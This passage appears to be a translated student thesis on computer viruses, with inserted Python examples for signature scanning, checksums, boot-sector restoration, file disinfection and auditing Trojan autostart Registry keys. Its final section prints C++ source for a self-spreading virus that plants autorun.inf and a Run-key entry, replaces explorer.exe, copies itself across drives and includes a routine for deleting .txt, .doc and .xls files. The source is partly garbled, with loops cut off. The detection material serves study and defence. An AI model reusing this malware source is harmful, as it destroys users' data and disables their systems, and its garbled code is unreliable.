If it relied on signature comparison alone, an antivirus product would fail, because that only deals with the consequences (the infected files) and not with the cause of the infection. With some weaker products one sees this case: the software removes the virus completely, but at the very next boot of the operating system it detects the same virus again. This may not be a case of recognising but failing to remove; rather, the virus re-infects because the software cannot monitor the operating system's boot process from the moment the BIOS hands over control.
That is why the software must combine every method of monitoring and blocking the virus's behaviour. A virus can plant commands in the registry to re-infect from some hidden file or to disable the antivirus; it can also arrange to be downloaded as soon as the browser connects to the Internet. The antivirus therefore has to combine every means of blocking viruses. These factors make the big difference between today's antivirus products and keep them from being lost among the countless others, given that even a student can write an antivirus by diligently collecting virus samples from the Internet.
2.2. VIRUS DETECTION METHODS
2.2.1. Scanning (scanner)
This is the earliest method and it is used by almost every antivirus program. Under this method the antivirus regularly updates the characteristic signatures of each virus and then inspects files. During the scan it compares the known virus signatures with the data of each file, and so detects the virus in the file if there is one.
Programs using this method must therefore update their virus signatures regularly; otherwise they will not detect new viruses.
2.2.2. Checksum
This is the data-integrity checking method used in communications, applied by some antivirus programs. Its principle is to detect changes in the objects being checked. Programs using it generate a value called a checksum and check it periodically against the current object (file, boot area). If a virus gets into the object, the program raises an alarm.
A virus can fool programs that use this method by producing a fake checksum. To prevent this, such programs use many encryption techniques to produce a checksum so complex that a virus cannot forge it.
The weakness of this method is that the check must be run regularly, which is very time-consuming, and it cannot tell a genuine change from a change made by a virus attack, so the user is always worried by false alarms. The method also lets a virus survive if it was already present when the first checksum was taken. A further drawback is that it cannot be used to detect macro viruses, because .DOC files change constantly through normal use.
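The checksum method above, as an added example that is not code from this document: a baseline of keyed checksums is taken once and re-verified later, reporting changed, missing and new objects. The "complex encryption" the text says is needed against a forged checksum is modelled with an HMAC whose key is kept away from the checked objects (an assumption of this example); the "files" and "boot sector" are constructed in-memory stand-ins. The demo also reproduces the two weaknesses the text names: a legitimate edit is reported exactly like a virus modification, and an object that was already infected at baseline time verifies as "ok".

```python
"""Checksum-based change detection: take a baseline of each object, then
re-verify it periodically. Added example, not code from the document. A keyed
HMAC (key stored off the checked objects) stands in for the 'complex
encryption' the text mentions; files and boot sector are constructed."""
import hashlib
import hmac
from typing import Dict


def make_checksum(key: bytes, data: bytes) -> str:
    """Keyed checksum: without `key` a virus cannot compute a matching value."""
    return hmac.new(key, data, hashlib.sha256).hexdigest()


def build_baseline(key: bytes, objects: Dict[str, bytes]) -> Dict[str, str]:
    return {name: make_checksum(key, data) for name, data in objects.items()}


def verify(key: bytes, baseline: Dict[str, str],
           objects: Dict[str, bytes]) -> Dict[str, str]:
    """Status per object: 'ok', 'modified', 'missing' or 'new'."""
    report = {}
    for name, expected in baseline.items():
        if name not in objects:
            report[name] = "missing"
        elif hmac.compare_digest(expected, make_checksum(key, objects[name])):
            report[name] = "ok"
        else:
            report[name] = "modified"
    for name in objects:
        if name not in baseline:
            report[name] = "new"
    return report


# Constructed objects; the names only suggest what a real checker covers.
KEY = b"baseline-key-kept-off-the-checked-disk"
CLEAN = {
    "BOOT_SECTOR": b"\xeb\x3c\x90MSDOS5.0" + b"\x00" * 20,
    "COMMAND.COM": b"MZ" + b"\x00" * 30,
    "REPORT.DOC": b"quarterly figures v1",
}


def demo() -> Dict[str, str]:
    """Baseline the clean set, then verify after several kinds of change."""
    baseline = build_baseline(KEY, CLEAN)
    later = dict(CLEAN)
    later["BOOT_SECTOR"] = b"\xeb\x3c\x90MSDOS5.0" + b"\x00" * 10 + b"X" * 10  # altered
    later["REPORT.DOC"] = b"quarterly figures v2"   # legitimate edit, same verdict
    del later["COMMAND.COM"]
    later["NEWTOOL.EXE"] = b"MZ" + b"\x01" * 30
    return verify(KEY, baseline, later)


def baseline_already_infected() -> Dict[str, str]:
    """The text's caveat: an object infected before the first checksum passes."""
    infected = {"BOOT_SECTOR": b"already carrying virus code"}
    return verify(KEY, build_baseline(KEY, infected), infected)


if __name__ == "__main__":
    for name, status in demo().items():
        print(f"{name}: {status}")
    print("baselined while infected:", baseline_already_infected())
```

The report deliberately does not distinguish the user's edit of REPORT.DOC from the altered boot sector: that is the false-alarm problem the text raises, and the usual answer is to checksum only objects that should never change on their own (boot areas, system executables) rather than user documents.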
2.2.3. Guard
A resident (TSR) program using this method intercepts every disk operation and program execution and warns the user of anything suspicious, such as writing to .EXE or .COM files or writing directly to the disk's boot area.
However, this does not detect boot viruses that use the BIOS functions to access the disk, because those viruses are loaded before the guard runs: they intercept the BIOS disk functions first, so programs of this kind cannot control them.
Guard programs also raise false alarms when applications legitimately write to .EXE or .COM files, for instance during compression, protection or software installation... And in general programs of this kind slow the system down.
Chapter 3. VIRUS PREVENTION
3.1. SEARCHING MEMORY
This is the most important step for all that follow, since nothing can be cured without knowing whether the system is infected and by which kind of virus. The search must first be done in memory, because once a resident virus holds control of the system, the information returned by subsequent disk accesses will be distorted. Only then is the disk searched. The presence of a virus goes together with the presence of a few special signs.
For macro viruses and TF-viruses, scanning memory is unnecessary and can be skipped; for B-viruses and RF-viruses it is essential. The search includes both predicting the possible presence of a new virus and precisely identifying known viruses in memory. The search in memory can go through the following steps.
1/. For B-viruses:
Compare the total memory reported by the BIOS with the total memory the program reads itself, after the self-check, to find a discrepancy. A memory discrepancy alone does not prove a virus is present; it is the basis for step two, since the discrepancy may also be caused by an ordinary program or by partly defective RAM.
Starting from the high memory area, search using the scanning technique: look for the virus's characteristic code in the high area. Any hit allows the conclusion that a virus is in memory.
If nothing is found, a new B-virus may still exist. If memory is short, interrupt 13h points into the missing region, and that region contains dangerous code, a B-virus can be concluded to be present.
2/. For RF-Viruses:
Either scan for the virus's characteristic code from low addresses up to high ones, or use the recognition-interrupt call that the viruses themselves install in order to recognise their own presence in memory. If nothing is found, a new RF-Virus may still exist. If the interrupt 21h vector points to a memory region containing dangerous code, the conclusion that a new RF-Virus is present is fairly reliable.
Detection on Disk
Detection on disk must be carried out only after memory has been checked and found free of viruses or, if a virus was found, after it has been neutralised.
Like most other antivirus programs, this program also uses the scan-for-signature method to detect viruses. First the boot area is scanned for B-Viruses, then files are scanned for F-Viruses, Trojans and Worms. To scan the boot area, BIOS interrupt 13h, function 02h (read sector), reads it into a buffer, which is then scanned for the characteristic virus code. To scan a file, the file-access functions of interrupt 21h are used: function 03Dh opens the file, then function 03Fh reads it into a buffer, which is scanned for virus code in the same way.
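As an added example (not the thesis's program), the signature scan described above, applied first to a boot sector and then to files. The DOS int 13h/21h reads are replaced by in-memory buffers so that it runs anywhere; the signature patterns and the sample boot sector and files are constructed for the example and are not real virus signatures. It goes slightly beyond the text by allowing wildcard bytes (`??`) in a signature, which is how signatures cope with the variable bytes (addresses, counters) that differ between infected files.

```python
"""Signature scanning of a boot sector and of files (section 3.1).

Added illustration, not the thesis's program: the DOS int 13h/21h reads are
replaced by in-memory buffers, and the signature patterns are constructed,
hypothetical byte sequences, not real virus signatures.
"""
import re

# Signature database: hex bytes separated by spaces; '??' matches any byte.
# These patterns are made up for the example.
SIGNATURES = {
    "Demo.Boot.A": "fa 33 c0 8e d0 ?? ?? ?? fb cd 13",
    "Demo.File.B": "e8 00 00 5e 81 ee ?? ?? b4 4c",
}


def compile_signature(pattern: str) -> "re.Pattern":
    """Turn 'fa 33 ?? cd' into a bytes regex; '??' becomes a one-byte wildcard."""
    parts = []
    for token in pattern.split():
        if token == "??":
            parts.append(b".")
        else:
            parts.append(re.escape(bytes([int(token, 16)])))
    return re.compile(b"".join(parts), re.DOTALL)


COMPILED = {name: compile_signature(p) for name, p in SIGNATURES.items()}


def scan_buffer(buf: bytes) -> list:
    """Return [(signature name, offset), ...] for every match in buf, ordered by offset."""
    hits = []
    for name, regex in COMPILED.items():
        for m in regex.finditer(buf):
            hits.append((name, m.start()))
    return sorted(hits, key=lambda h: (h[1], h[0]))


def scan_system(boot_sector: bytes, files: dict) -> dict:
    """Scan the boot sector first, then each file, in the order the text prescribes."""
    report = {"BOOT": scan_buffer(boot_sector)}
    for name, data in files.items():
        report[name] = scan_buffer(data)
    return report


def build_samples():
    """Constructed test data: a boot sector carrying Demo.Boot.A right after
    its 62-byte BPB area, a COM file starting with Demo.File.B, and a clean
    COM file."""
    boot = bytearray(512)
    boot[0:3] = b"\xeb\x3c\x90"
    boot[62:73] = bytes.fromhex("fa33c08ed0bc007cfbcd13")
    boot[510:512] = b"\x55\xaa"
    files = {
        "GAME.COM": bytes.fromhex("e800005e81ee0301b44ccd21") + b"\x90" * 16,
        "CLEAN.COM": b"\xb4\x4c\xcd\x21" + b"\x90" * 16,
    }
    return bytes(boot), files


if __name__ == "__main__":
    boot, files = build_samples()
    for target, hits in scan_system(boot, files).items():
        print(target, hits or "clean")
```

With the constructed data the report finds Demo.Boot.A at offset 62 of the boot sector and Demo.File.B at offset 0 of GAME.COM, and nothing in CLEAN.COM; a real scanner would additionally check the memory-resident part first, as the preceding subsection requires.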
3.2. REMOVING VIRUSES AND RECOVERING DATA
If a memory-resident virus is still present before viruses on the disk are removed, the program first neutralises the virus in memory, where necessary and possible. Nevertheless, rebooting the computer from a clean system disk before removing viruses remains the safest approach.
3.2.1. B-Virus
Many people think that removing the virus and restoring the disk is simply a matter of writing a clean boot sector over the infected one. However, if the disk's boot sector performs a special task this is very hard to do, and besides, the disk has a parameter table which, if altered even slightly by the virus, can leave the disk unusable (overwriting is reasonable only if the clean boot sector is the disk's own boot sector, saved earlier). The best approach is therefore to restore the original boot sector, and only if that proves impossible to write a generic clean one. The steps are:
Based on the disk type (hard disk or floppy) and the virus type, decode the virus to determine where it stored the original boot sector.
Read the original boot sector into a buffer with BIOS interrupt 13h (function 02h, read sector) and check that it is valid.
Only if that check passes, write it over the infected boot sector with BIOS interrupt 13h, function 03h (write sector).
For DB-Viruses, restoring the disk may also involve freeing clusters that were marked bad on the disk, if the virus used the FAT-allocation method to hide itself. The best rule here is: do what the virus did, but in reverse.
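The validity check in the second step is the part practitioners most often skip. As an added example (not code from the thesis), the following checks a recovered boot sector for plausibility before it is written back, modelling the int 13h read/write on a bytearray "disk". The sample sectors are constructed; the field layout and accepted values are those of a FAT boot sector (BIOS Parameter Block at offset 11, 55AA signature at offset 510), with a 1.44 MB floppy as the sample.

```python
"""Validating a recovered boot sector before writing it back (section 3.2.1).

Added illustration, not code from the thesis. The BIOS int 13h reads and
writes are modelled on a bytearray 'disk'; the sample sectors are
constructed, and the FAT12 layout values are those of a 1.44 MB floppy.
"""
import struct

# bytes/sector, sectors/cluster, reserved sectors, FATs, root entries, total sectors (16-bit), media
BPB_FORMAT = "<HBHBHHB"
BPB_OFFSET = 11


def check_boot_sector(sector: bytes) -> list:
    """Return a list of problems found; an empty list means the sector is plausible.

    These are the sanity checks the text calls 'checking validity': a virus may
    have stored the original sector in a place that was later overwritten, and
    writing garbage back would make the disk unusable.
    """
    if len(sector) != 512:
        return ["sector is %d bytes, expected 512" % len(sector)]
    problems = []
    if sector[0] not in (0xEB, 0xE9):
        problems.append("first byte is not a JMP opcode (EB or E9)")
    if sector[510:512] != b"\x55\xaa":
        problems.append("missing 55AA boot signature")
    bps, spc, reserved, fats, root, total16, media = struct.unpack_from(BPB_FORMAT, sector, BPB_OFFSET)
    total32 = struct.unpack_from("<I", sector, 32)[0]
    if bps not in (512, 1024, 2048, 4096):
        problems.append("bytes per sector %d is not valid" % bps)
    if spc == 0 or spc > 128 or spc & (spc - 1):
        problems.append("sectors per cluster %d is not a power of two in 1..128" % spc)
    if reserved == 0:
        problems.append("reserved sector count is zero")
    if fats not in (1, 2):
        problems.append("FAT count %d is not 1 or 2" % fats)
    if total16 == 0 and total32 == 0:
        problems.append("total sector count is zero")
    if media != 0xF0 and media < 0xF8:
        problems.append("media descriptor %02X is not F0 or F8..FF" % media)
    return problems


def restore_boot_sector(disk: bytearray, saved: bytes) -> bool:
    """Write `saved` over sector 0 of `disk` only if it passes the checks.

    This models the text's last step: int 13h/02h reads the saved copy, the copy
    is checked, and only then does int 13h/03h write it to sector 0.
    """
    if check_boot_sector(saved):
        return False
    disk[0:512] = saved
    return True


def build_floppy_boot_sector() -> bytes:
    """Constructed sample: a plausible 1.44 MB FAT12 boot sector."""
    sector = bytearray(512)
    sector[0:3] = b"\xeb\x3c\x90"
    sector[3:11] = b"MSDOS5.0"
    struct.pack_into(BPB_FORMAT, sector, BPB_OFFSET, 512, 1, 1, 2, 224, 2880, 0xF0)
    sector[510:512] = b"\x55\xaa"
    return bytes(sector)


def demo() -> tuple:
    """Try to restore from a half-overwritten saved copy, then from a good one."""
    disk = bytearray(b"\xff" * 512)                              # sector 0 currently holds the virus
    corrupted = build_floppy_boot_sector()[:256] + bytes(256)    # tail of the saved copy overwritten
    first = restore_boot_sector(disk, corrupted)
    second = restore_boot_sector(disk, build_floppy_boot_sector())
    return first, second, bytes(disk) == build_floppy_boot_sector()


if __name__ == "__main__":
    print(check_boot_sector(build_floppy_boot_sector()[:256] + bytes(256)))
    print(demo())
```

The half-overwritten copy is rejected because its 55AA signature is gone, so the disk is left untouched; the intact copy passes and is written. Rejection is the cue for the text's fallback of writing a generic clean boot sector, with the parameter table filled in from the disk geometry rather than from the virus's saved copy.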
3.2.2. F-Virus
1/. Macro viruses:
Removal is simply a matter of deleting the virus's macros (using function 040h of interrupt 21h).
2/. Conventional F-Viruses:
Decode the virus to recover the program data it took over, then cut the virus code out of the program.
3/. For .COM and .BIN files:
If the virus appends itself to the file: restore the leading bytes that the virus took over, move the file pointer to the start of the virus code (function 042h of interrupt 21h) and truncate the file there with DOS interrupt 21h, write-file function 040h.
If the virus prepends itself: read the file from just after the virus code into memory with interrupt 21h, read-file function 03Fh, then write it back (function 040h of interrupt 21h).
If the virus infects by using empty space in the file: locate and restore the leading bytes that the virus took over, move the file pointer to the virus code and erase it.
4/. For .EXE files:
Removal is similar to .COM files. If the virus saved the file's old EXE header, restoration is simply a matter of returning that header to the file; otherwise several fields of the EXE header table must be recalculated, such as the .EXE signature MZ, the total number of pages, and the number of bytes in the last page of the file.
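As an added example serving both item 3 (appending infection of a .COM file) and item 4 (.EXE header fields), and not code from the thesis: the .COM disinfection restores the leading bytes and truncates at the virus body, as the text describes with int 21h functions 42h and 40h, here modelled on byte strings; the .EXE part reads the MZ header's page count and bytes-in-last-page, compares the declared size with the actual file size to spot appended code, and recomputes those two fields. The infection layout is an assumption chosen for the example (the virus replaced the first three bytes with a near JMP to its body at the end of the file and kept those three bytes at the start of the body), and the sample files and the inert "virus body" are constructed.

```python
"""Disinfecting an appending COM infection and checking an EXE header (3.2.2).

Added illustration, not code from the thesis. The DOS calls in the text
(int 21h/42h to seek, 40h with zero bytes to truncate) are modelled on byte
strings. Infection model (an assumption for the example): the virus replaces
the first three bytes of the COM file with a near JMP to its body at the end
of the file and keeps the three original bytes at the start of that body.
The 'virus body' in the sample is inert filler.
"""
import struct

SAVED_BYTES_OFFSET = 0   # where, inside the body, the original 3 bytes are kept (assumption)


def disinfect_com(infected: bytes) -> bytes:
    """Restore the original head bytes and cut the appended body off."""
    if len(infected) < 3 or infected[0] != 0xE9:
        raise ValueError("file does not start with a near JMP; not this infection type")
    disp = struct.unpack_from("<h", infected, 1)[0]
    body = 3 + disp                     # JMP rel16 is relative to the byte after the instruction
    if not 3 <= body <= len(infected) - 3:
        raise ValueError("JMP target outside the file")
    head = infected[body + SAVED_BYTES_OFFSET: body + SAVED_BYTES_OFFSET + 3]
    return head + infected[3:body]      # original head back, file truncated at the body


def exe_declared_size(data: bytes) -> int:
    """File size implied by the MZ header: e_cp 512-byte pages, e_cblp bytes used in the last page."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_cblp, e_cp = struct.unpack_from("<HH", data, 2)
    size = e_cp * 512
    if e_cblp:
        size -= 512 - e_cblp
    return size


def exe_size_fields(size: int) -> tuple:
    """Recompute (e_cblp, e_cp) for a file of `size` bytes, the inverse of exe_declared_size."""
    return size % 512, (size + 511) // 512


def exe_appended_bytes(data: bytes) -> int:
    """Bytes present beyond what the header declares; a common sign of an appending virus."""
    return len(data) - exe_declared_size(data)


def disinfect_exe_appender(data: bytes) -> bytes:
    """Cut everything past the declared size (only valid when the header itself is intact)."""
    return data[:exe_declared_size(data)]


# Constructed samples
ORIGINAL_COM = bytes.fromhex("b409ba0c01cd21cd20")          # mov ah,9 / mov dx,... / int 21h / int 20h
_BODY = ORIGINAL_COM[:3] + b"\x90\x90\xcd\x20"               # saved head bytes + inert filler
INFECTED_COM = (b"\xe9" + struct.pack("<h", len(ORIGINAL_COM) - 3)
                + ORIGINAL_COM[3:] + _BODY)
CLEAN_EXE = b"MZ" + struct.pack("<HH", 32, 2) + bytes(544 - 6)   # 2 pages, 32 bytes in the last
INFECTED_EXE = CLEAN_EXE + b"\x90" * 100                         # 100 bytes past the declared size

if __name__ == "__main__":
    print(disinfect_com(INFECTED_COM) == ORIGINAL_COM)
    print(exe_appended_bytes(CLEAN_EXE), exe_appended_bytes(INFECTED_EXE), exe_size_fields(544))
```

When the virus has overwritten the header fields rather than merely appended, `exe_declared_size` is no longer trustworthy and the header must be rebuilt from the decoded virus, which is the case the text describes as "recalculating" the fields.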
3.2.3. Trojans
A Trojan infects the computer but does not infect the files on it, so when removing a Trojan we need not examine whether copies of it are active in the system. A Trojan has the property that it must be activated before it can run, so an effective way to defeat it is to prevent it from being activated. To remove a Trojan in this way we must know the methods through which a Trojan can get itself activated.
Some methods Trojans commonly use to get activated are (taking the startup file to be Trojan.exe):
In the folders whose files are launched when Windows starts:
C:\Windows\Start Menu\Programs\startup\Trojan.exe
In the file C:\windows\Win.ini, on the line:
Load=Trojan.exe
or run=Trojan.exe
In the file c:\windows\system.ini, after the shell line Shell=Explorer.exe, so that it is launched from there.
In Autoexec.bat:
C:\....\Trojan.exe
In the Windows startup folder: C:\ \ Trojan.exe
Creating keys in the Registry:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
Trojan=c:\\ Trojan.exe
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce]
Trojan=c:\...\Trojan.exe
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
Trojan=c:\....\Trojan.exe
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce]
Trojan=c:\....\Trojan.exe
[HKEY_LOCAL_USER\Software\Microsoft\Windows\CurrentVersion\Run]
Trojan=c:\....\Trojan.exe
[HKEY_LOCAL_USER\Software\Microsoft\Windows\CurrentVersion\RunServices]
Trojan=c:\....\Trojan.exe
- In the Registry shell\open commands, with the value %1%*:
[HKEY_CLASSES_ROOT\exefile\shell\open\command]
[HKEY_CLASSES_ROOT\comfile\shell\open\command]
[HKEY_CLASSES_ROOT\batfile\shell\open\command]
[HKEY_CLASSES_MACHINE\SOFTWARE\Classes\exefile\shell\open\command]
Trojan.exe = %1%*
- In some applications that allow other programs to be launched:
+ In ICQ:
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Agent\Apps\]
+ In ActiveX:
[HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\KeyName]
StubPath=c:\...\Trojan.exe
To remove the Trojan, delete every entry through which the Trojan file would be launched at computer startup (in this example, the file Trojan.exe).
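Checking the autostart locations listed above is tedious by hand, so here is an added example (not code from the thesis) that audits them from a Registry text export in the REGEDIT4 format, the same format the thesis's own listing later uses. It lists every value under the Run, RunOnce, RunServices and RunServicesOnce keys and flags any exefile, comfile or batfile shell\open\command whose default value is not the normal "%1" %* (a program inserted there, as in the Trojan.exe = %1%* entry above, is started every time any executable is opened). Parsing an export rather than the live Registry keeps the example runnable offline; the sample export is constructed, and the Trojan.exe paths in it are the thesis's example names.

```python
"""Auditing the autostart locations of section 3.2.3 from a Registry export.

Added illustration, not code from the thesis. It parses the REGEDIT4 text
export format so that it runs anywhere, offline; the sample export below is
constructed, and the Trojan.exe paths in it are the thesis's example names.
"""
import re

AUTOSTART_KEYS = (
    r"Software\Microsoft\Windows\CurrentVersion\Run",
    r"Software\Microsoft\Windows\CurrentVersion\RunOnce",
    r"Software\Microsoft\Windows\CurrentVersion\RunServices",
    r"Software\Microsoft\Windows\CurrentVersion\RunServicesOnce",
)
SHELL_OPEN_KEYS = tuple(ft + r"\shell\open\command" for ft in ("exefile", "comfile", "batfile"))
EXPECTED_SHELL_OPEN = '"%1" %*'      # normal default: run the opened file itself with its arguments

_VALUE_LINE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')


def _unescape(s: str) -> str:
    """REGEDIT4 strings escape backslash and double quote with a backslash."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg_export(text: str) -> dict:
    """Parse a REGEDIT4 export into {key path: {value name: value}}; '@' is the default value."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";") or line == "REGEDIT4":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = _VALUE_LINE.match(line)
        if m and current is not None:
            name = "@" if m.group(1) == "@" else _unescape(m.group(1)[1:-1])
            value = m.group(2)
            if value.startswith('"') and value.endswith('"'):
                value = _unescape(value[1:-1])       # string value; hex:/dword: values kept raw
            keys[current][name] = value
    return keys


def audit_autostart(keys: dict) -> list:
    """Return (key, value name, value, reason) for every entry worth a look."""
    findings = []
    for key, values in keys.items():
        path = "\\" + key.partition("\\")[2].lower()   # drop the hive name, normalise case
        if any(path.endswith("\\" + k.lower()) for k in AUTOSTART_KEYS):
            for name, value in values.items():
                findings.append((key, name, value, "program launched at startup"))
        elif any(path.endswith("\\" + k.lower()) for k in SHELL_OPEN_KEYS):
            value = values.get("@", "")
            if value != EXPECTED_SHELL_OPEN:
                findings.append((key, "@", value, "shell\\open\\command does not run the file itself"))
    return findings


# Constructed sample export (not taken from a real system).
SAMPLE_EXPORT = r'''REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SystemTray"="SysTray.Exe"
"Trojan"="c:\\windows\\Trojan.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Trojan"="c:\\windows\\Trojan.exe"

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="Trojan.exe \"%1\" %*"

[HKEY_CLASSES_ROOT\comfile\shell\open\command]
@="\"%1\" %*"
'''

if __name__ == "__main__":
    for finding in audit_autostart(parse_reg_export(SAMPLE_EXPORT)):
        print(*finding, sep=" | ")
```

On the sample the audit lists the three Run/RunOnce values (the legitimate SystemTray entry included, since every startup entry deserves a look) and flags the exefile command; the comfile command is left alone because it still equals "%1" %*. The file-based locations from the list above (Win.ini, system.ini, Autoexec.bat, the Startup folder) are not in the Registry and have to be inspected separately.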
3.2.4. Worms
To remove an Internet worm, carry out the following in turn:
- Study the information about the worm.
- Remove the infecting part from the infected files.
Every Internet worm has its own characteristics, so it is essential to study the worm: the name of its executable file, the path of that file, its effects on other files in the system, the files it creates, and the signature code of each worm.
Using the worm's signature code, files can be scanned to find and remove that worm.
3.3. CREATING A COMPUTER VIRUS
An experimental computer-virus program written in Visual C++ and run on Windows XP.
The virus program:
Declarations
#include "stdafx.h"
#include
#include
#include#include
#include
#define SVCHOST_NUM 6
#define RUBBISH_NUM 5
#define REMOVE_NUM 5
/*=================================================*/
Char*autorun={"[AutoRun]\nopen=\"SVCHOST.com
/s\"\nshell\\open=(&O)\\nshell\\open\\Command=\"SVCHOST.com
/s\"\nshell\\explore=(&X)\\nshell\\explore\\Command=\"SVCHO
ST.com /s\""};
/*=================================================*/char *regadd={"REGEDIT4\n\n\
[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\Curr
entVersion\\Run]\n\"wjview32\\"=\"C:\\\\windows\\\\wjview32.com /s\""};
/*=================================================*/
int copy(char *infile,char *outfile)
{
FILE *input,*output;
char temp;
if(strcmp(infile,outfile)!=0 && ((input=fopen(infile,"rb"))!=NULL)
&& ((output=fopen
(outfile,"wb"))!=NULL))
{
while(!feof(input))
{
fread(&temp,1,1,input);
fwrite(&temp,1,1,output);
}fclose(input);
fclose(output);
return 0;
}
else return 1;
}
/*=================================================*/
int autorun_explorer()
{
FILE *input;
if((input=fopen("C:\\windows\\system\\explorer.exe","rb"))!=NULL)
{
fclose(input);
remove("C:\\windows\\$temp$");
remove("C:\\windows\\system32\\dllcache\\$temp$");
return 1;
}
copy("C:\\windows\\explorer.exe","c:\\windows\\system\\explorer.exe");
rename("C:\\windows\\explorer.exe","C:\\windows\\$temp$");
rename("C:\\windows\\system32\\dllcache\\explorer.exe","C:\\windows\\syste
m32\
\\dllcache\\$temp$");
if(copy("SVCHOST.com","C:\\windows\\explorer.exe")==0 && copy
("SVCHOST.com","C:\\windows\\system32\\dllcache\\explorer.exe")==0
)
return 0;
else
return 2;
}
/*=================================================*/
int add_reg()
{
FILE *output;
if((output=fopen("$$$$$","w"))!=NULL)
{
fprintf(output,regadd);
fclose(output);
spawnl(1,"C:\\windows\\regedit.exe"," /s $$$$$",NULL);
return 0;
}
return 1;
}
/*=================================================*/
void copy_virus()
{
int i,k;
FILE *input,*output;char *files_svchost[SVCHOST_NUM]=
{"svchost.com","C:\\windows\\wjview32.com","c:\\windows\\system\\M
SMOUSE.DLL","c:\\windows\\syste\
m32\\cmdsys.sys","C:\\windows\\system32\\mstsc32.exe","c:\\windows\\
explorer.exe"};
char temp[2][20]={"C:\\svchost.com","c:\\autorun.inf"};
for(i=0;i
temp[0][0]++;
temp[1][0]++;
}
i=SVCHOST_NUM;
}
}
}
/*=================================================*/
void make_rubbish()
{
int i;
FILE *output;
srand(0);
for(i=0;i
}
}
/*================================================*/
void remove_files()
{
long done;
int i;
struct _finddata_t ffblk;
char *remove_files[3]={"*.txt","*.doc","*.xls"};
for(i=0;i
{ int contral=0;
autorun_explorer();
spawnl(1,"c:\\windows\\system\\explorer.exe"," /s",NULL);
add_reg();
copy_virus();
make_rubbish();
spawnl(1,"c:\\windows\\system32\\mstsc32.exe"," /s",NULL);
return 0;
}
Screenshot: drive C before running the virus
After the Win32 virus program runs, it automatically creates and deletes the following files.
When the program is run from Visual C++, it automatically modifies several Windows files, causing Windows XP to fail at startup:
CreateFile C:\windows\system32\dllcache\$temp$
DeleteFile C:\windows\system32\dllcache\explorer.exe
CreateFile C:\windows\$temp$
DeleteFile C:\windows\explorer.exe
CreateFile C:\windows\system\explorer.exe
Screenshot: drive C after running the virus
After this virus program has run and the computer is rebooted, the desktop no longer starts, because the file C:\windows\system\explorer.exe has been changed and the files C:\windows\system32\dllcache\$temp$ and C:\windows\$temp$ have been created, so Windows XP cannot load the program that starts up the Windows XP desktop.
Screenshot: the screen shows neither the Start taskbar nor any folders
Conclusion
Results achieved by this thesis:
1. Study and research of theory:
- An overview of computer viruses and the operation of B-Viruses, F-Viruses, macro viruses, Trojans and Internet worms.
- Some methods for detecting and identifying computer viruses.
- Some methods for preventing and removing computer viruses.
2. Experiment: a program simulating the creation of a computer virus.